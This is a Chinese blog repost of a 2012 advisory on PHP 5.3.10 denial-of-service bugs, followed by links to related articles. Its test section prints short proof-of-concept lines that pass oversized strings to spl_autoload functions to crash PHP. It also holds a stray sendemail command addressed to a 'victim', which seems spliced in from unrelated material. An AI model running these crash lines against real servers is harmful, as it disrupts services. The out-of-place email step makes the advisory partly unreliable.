php 5.3.3 漏洞,PHP 5.3.10多个拒绝服务漏洞

最新推荐文章于 2024-01-24 14:17:02 发布
最新推荐文章于 2024-01-24 14:17:02 发布
阅读量428 收藏
点赞数
文章标签: php 5.3.3 漏洞

发布日期:2012-06-03

更新日期:2012-06-05

受影响系统:

PHP PHP  5.3.10

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 53763

PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是一种在服务器端执行的嵌入HTML文档的脚本语言,语言的风格有类似于C语言,现在被很多的网站编程人员广泛的运用。

PHP 5.3.10在实现上存在多个远程拒绝服务漏洞,成功利用后可造成应用崩溃。

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

$buffer = str_repeat("A",9999);

spl_autoload_register($buffer);

$buff = str_repeat("A",9999);

spl_autoload($buff);

$buffer = str_repeat("A",9999);

spl_autoload_call($buffer);

Send email to the victim:

root@bt:~/# sendemail -f bob@example.com -t david@example.com -xu bob@example.com \

-xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com

建议:

--------------------------------------------------------------------------------

厂商补丁:

PHP

---

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

0b1331709591d260c1c78e86d0c51c18.png

weixin_39716044
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Shopware 5.3.3 XEE漏洞复现
heySister
12-11 1290
环境搭建 使用了php7.0版本、Mysql 5.5版本、Apache2 在安装过程中还挺烦的,因为各种扩展没有弄好…emmm…可能因为我没有好好看readme吧。 安装php7.0-curl curl php7.0-mysql php7.0-xml 在php.ini 中开启curl | mysql | pdo-mysql | xml扩展 反正就是提示什么错误,就对应去找就好了。 以后搭环境就...
源码包下载php-5.3.3.tar.gz
02-10
官网找不到的旧版本,源码包下载 php-5.3.3.tar.gz适合linux
php 5.3.3 漏洞,PHP 5.3.7版本更新 修复安全漏洞
weixin_42363022的博客
03-11 841
【IT168 专稿】据PHP官方网站消息,PHP开发人员于8月18日正式发布最新版PHP 5.3.7版本,这是对PHP脚本语言稳定分支的安全和维护更新。此次更新对90多个bug进行了修复,并对PHP自带的数据库软件Sqlite3(更新至版本3.7.7.1)和表达式函数库PCRE(更新至版本8.12)进行更新。在前一版本中,大量bug造成了很多崩溃缺陷,例如在使用tack_errors、调用未知函数...
php5.3.x 漏洞,ThinkPHP 3.X/5.X order by注入漏洞
weixin_34124963的博客
03-20 616
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领...
php/5.3.10漏洞,Metinfo5.3.10版本Getshell
weixin_39627455的博客
03-11 381
好久没代码审计了,今早上cheery师傅跟我说了一下这个洞,尽管这个洞已经被修复了,但是还是比较新的,看了下没那么难,就简单写下步骤:0x01首先看一下配置的文件include/common.inc.php发现Metinfo采用了伪全局变量的这样一个设置,那么是否会有变量覆盖之类的漏洞,grep下:0x02觉得login那里应该会发生点什么故事XD既然这样的话,看了下后台登录的地方:login.p...
php/5.3.10漏洞,PHP-5.3.9远程执行任意代码漏洞(CVE-2012-0830) 详解_PHP教程
weixin_42570484的博客
03-11 730
还记得我之前说的PHP Hash Collisions Ddos漏洞吧? 最初的时候, 开发组给出的修复方案, 采用的是如果超过max_input_vars, 就报错(E_ERROR), 继而导致PHP出错结束. 而后来, 为了更加轻量级的解决这个问题, 我们又改善了一下, 变成了如果超过max_input_vars, 就发出警告(E_WARNING), 并且不再往目的数组添加, 但是流程继续. ...
PHP_Redis扩展 redis-5.3.3.tgz
06-26
- **哈希表**:可以将多个键值对存储在一个键下,方便管理和操作。 - **列表**:可以像数组一样插入、弹出、获取范围内的元素,常用于实现FIFO(先进先出)队列。 - **集合**:无序的不重复元素集合,支持交集、并集...
php5.3.3_APC扩展模块
08-02
APC是PHP的一个免费且开源的 opcode 缓存,用于提高PHP脚本的执行速度。在PHP 5.3.3版本中,APC扩展模块被广泛使用,尤其是在WAMP(Windows Apache MySQL PHP)服务器环境下,它能够显著提升网站性能。 ### 一、APC...
php-process
03-29
关于低版本PHP资源离线...php-5.3.3-50.el6_10.x86_64.rpm php-cli-5.3.3-50.el6_10.x86_64.rpm php-common-5.3.3-50.el6_10.x86_64.rpm php-gd-5.3.3-50.el6_10.x86_64.rpm php-ldap-5.3.3-50.el6_10.x86_64.rpm ...
高级PHP应用程序漏洞审核技术
02-22
随着Web安全逐渐成为焦点,PHP应用程序的安全问题也日益突出,越来越多的安全研究人员投入到该领域,不断发现并公布各种代码漏洞。为了应对这一趋势,许多应用程序开发者或公司设立了专门的安全团队,采用自动化工具...
php5.3.10-patch:本补丁主要针对使用老版本php5.3的项目,因为升级服务器的php版本不是那么容易
05-31
php5.3.10-补丁 PHP 容易受到远程拒绝服务的影响,这是由于 PHP 使用 multipart/form-data 解析 HTTP 请求正文部分的标头区域时重复分配内存、连接字符串、复制字符串和释放内存造成的。 远程攻击者可以通过向受影响的应用程序发送多个 HTTP 多部分请求,其中包含正文部分的恶意标头 raea,从而利用该漏洞消耗 CPU 资源。 针对这个问题,PHP官方第一时间发布补丁。 但是,该解决方案仅适用于高于PHP5.4的版本,缺少较低的版本。 由于我们公司使用的是PHP5.3.10,并且PHP5.3被广泛应用于各种项目中,因此该漏洞可能会产生非常恶劣的影响。 文件夹结构如下: --main --|rfc1867.c ##the patch file --|rfc1867.c.bak ##the previou
php漏洞cve,PHP-fpm 远程代码执行漏洞(CVE-2019-11043)分析
weixin_34462016的博客
03-09 415
作者:LoRexxar'@知道创宇404实验室时间:2019年10月25日国外安全研究员 Andrew Danau在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。2019年10月23日,github公开漏洞相关的详情以及exp。当nginx配置不当时,会导致php-fpm远程任意代码执行。下面我们就来一点点看看漏洞的详细分析,文章中漏洞分析部...
phpcms前台任意代码执行漏洞(php<5.3)
weixin_30399871的博客
07-08 724
phpcms v9 中 string2array()函数使用了eval函数,在多个地方可能造成代码执行漏洞 /phpsso_server/phpcms/libs/functions/global.func.php /** * 将字符串转换为数组 * * @param string $data 字符串 * @return array 返回数组格式,如...
php5.3之前的strcmp的漏洞
ChenZIDu的博客
09-22 376
例题 南邮CG-CTF:http://chinalover.sinaapp.com/web21/ 源码: `<?php $pass=@$_POST['pass']; $pass1=***********;//被隐藏起来的密码 if(isset($pass)) { if(@!strcmp($pass,$pass1)){ echo "flag:nctf{*}"; }else{ echo "the...
PHP 5.3.1版本之前的拒绝服务攻击漏洞(附测试代码)
weixin_30726161的博客
08-09 110
# # PHP MultiPart Form-Data Denial of Service proof of concept, 23-10-2009 # Bogdan Calin (bogdan@acunetix.com) # import httplib, urllib, sys, string, threading from string import replace ...
PHP网站常见一些安全漏洞及防御方法
最新发布
Spontaneous_0的博客
01-24 1053
一、常见PHP网站安全漏洞对于PHP漏洞,目前常见的漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。1、session文件漏洞Session攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时,为了免客户每进人一个页面都要输人账号和密码,PHP设置了Session和Cookie用于方便用户的使用和访向。2、SQL注入漏洞
手把手教你PHP反序列化漏洞
qq_62099202的博客
08-08 1422
什么是序列化 序列化是将变量转换为可保存或传输的字符串的过程 反序列化就是在适当的时候把这个字符串再转化成原来的变量使用 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性 简单来说就是将一大段对象压缩成字符串 例如,可以序列化一个对象,然后使用 HTTP 通过 Internet 在客户端和服务器之间传输该对象,或者和其它应用程序共享使用。反之,反序列化根据流重新构造对象
PHP 5.3.6缓冲区溢出漏洞POC
收集盒 Book box
07-19 1421
杯具这东西也出溢出,不过版本貌似也太高了点吧。现在多用5.1几的吧。呃。TOOLS大牛搞的?有用的拿去玩玩吧!!!   /*   ** xiaolandjj@qq.com   ** http://www.t00ls.net   ** 2011-07-1   ** Stack-
【代码审计】CLTPHP_v5.5.3 前台任意文件上传漏洞分析
12-02 996
  0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/cltphp 默认后台地址: http://127.0.0.1/admin/login/index.html 默认账号密码: 后台登录名:admin  密码:admin123...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值